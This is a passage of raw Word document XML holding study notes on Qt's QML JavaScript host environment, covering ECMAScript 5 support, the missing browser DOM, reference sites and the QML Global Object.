          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>qtqml</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>javascript</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>hostenvironment</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B2C7D" w:rsidRPr="00D815C8" w:rsidRDefault="004B2C7D" w:rsidP="00E7621B">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="98" w:name="_Toc483000543"/>
      <w:bookmarkStart w:id="99" w:name="_Toc483603902"/>
      <w:bookmarkStart w:id="100" w:name="_Toc483605122"/>
      <w:r w:rsidRPr="00E7621B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JavaScript Host Environment</w:t>
      </w:r>
      <w:bookmarkEnd w:id="98"/>
      <w:bookmarkEnd w:id="99"/>
      <w:bookmarkEnd w:id="100"/>
    </w:p>
    <w:p w:rsidR="004B2C7D" w:rsidRPr="00D815C8" w:rsidRDefault="004B2C7D" w:rsidP="009B0257">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">QML provides a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JavaScript host environment</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> tailored to writing QML applications. This environment is </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>different</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the host environment provided by a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>browser</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> or a server-side </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> environment such as Node.js. For example, QML does </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>not provide a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>window</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> object or </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DOM API</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>as</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> commonly found in a browser environment.</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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JavaScript structure.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0045447C" w:rsidRPr="00D815C8" w:rsidRDefault="0045447C" w:rsidP="00A410FF">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="101" w:name="_Toc483000544"/>
      <w:bookmarkStart w:id="102" w:name="_Toc483603903"/>
      <w:bookmarkStart w:id="103" w:name="_Toc483605123"/>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Common Base</w:t>
      </w:r>
      <w:bookmarkEnd w:id="101"/>
      <w:bookmarkEnd w:id="102"/>
      <w:bookmarkEnd w:id="103"/>
    </w:p>
    <w:p w:rsidR="004B2C7D" w:rsidRPr="00D815C8" w:rsidRDefault="0045447C" w:rsidP="009B0257">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="0"/>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Like a browser or server-side JavaScript environment, the QML runtime implements the</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId62" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ECMAScript Language Specification</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 xml:space="preserve">standard. This provides access to all of the built-in types and functions defined by the standard, such as </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Object, Array, and Math</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. The QML runtime implements the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5th edition of the standard</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, which is the same edition commonly implemented by browsers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B2C7D" w:rsidRPr="00D815C8" w:rsidRDefault="0045447C" w:rsidP="009B0257">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="0"/>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The standard ECMAScript built-ins are not explicitly documented in the QML documentation. For more information on their use, please refer to the ECMA-262 5th </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>edition standard or one of the many online JavaScript reference and tutorial sites, such as the</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId63" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>W3Schools JavaScript Reference</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 xml:space="preserve">(JavaScript Objects Reference section). Many sites focus on JavaScript in the browser, so in some cases you may </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>need to double check the specification to determine whether a given function or object is part of standard ECMAScript or specific to the browser environment</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B2C7D" w:rsidRPr="00D815C8" w:rsidRDefault="0045447C" w:rsidP="009B0257">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In the case of the W3Schools link above, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JavaScript Objects Reference</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> section generally covers the standard, while the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Browser Objects Reference</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HTML DOM Objects Reference</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> sections are browser specific (and thus not applicable to QML)</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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>спасылка на навучанне інтэрнэт-тэхналогій</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0045447C" w:rsidRPr="00D815C8" w:rsidRDefault="0045447C" w:rsidP="00A410FF">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="104" w:name="_Toc483000545"/>
      <w:bookmarkStart w:id="105" w:name="_Toc483603904"/>
      <w:bookmarkStart w:id="106" w:name="_Toc483605124"/>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML Global Object</w:t>
      </w:r>
      <w:bookmarkEnd w:id="104"/>
      <w:bookmarkEnd w:id="105"/>
      <w:bookmarkEnd w:id="106"/>
    </w:p>
    <w:p w:rsidR="0045447C" w:rsidRPr="00D815C8" w:rsidRDefault="0045447C" w:rsidP="009B0257">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="0"/>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The </w:t>
      </w:r>
      <w:r w:rsidRPr="00A410FF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">QML JavaScript host environment implements a number of host </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>objects and functions</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, as detailed in the</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId64" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QML Global Object</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documentation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0045447C" w:rsidRPr="00D815C8" w:rsidRDefault="0045447C" w:rsidP="009B0257">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="0"/>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These host objects and functions </w:t>
      </w:r>
      <w:r w:rsidRPr="00A410FF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>are always available</w:t>
      </w:r>
      <w:r w:rsidRPr="00A410FF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> regardless of whether any modules have been imported.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0045447C" w:rsidRPr="00D815C8" w:rsidRDefault="0045447C" w:rsidP="008B6FAC">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="107" w:name="_Toc483000546"/>
      <w:bookmarkStart w:id="108" w:name="_Toc483603905"/>
      <w:bookmarkStart w:id="109" w:name="_Toc483605125"/>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JavaScript Objects and Functions</w:t>
      </w:r>
      <w:bookmarkEnd w:id="107"/>
      <w:bookmarkEnd w:id="108"/>
      <w:bookmarkEnd w:id="109"/>
    </w:p>
    <w:p w:rsidR="0045447C" w:rsidRPr="00D815C8" w:rsidRDefault="0045447C" w:rsidP="0045447C">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A list of the JavaScript objects, functions and properties supported by the QML engine can be found in the</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
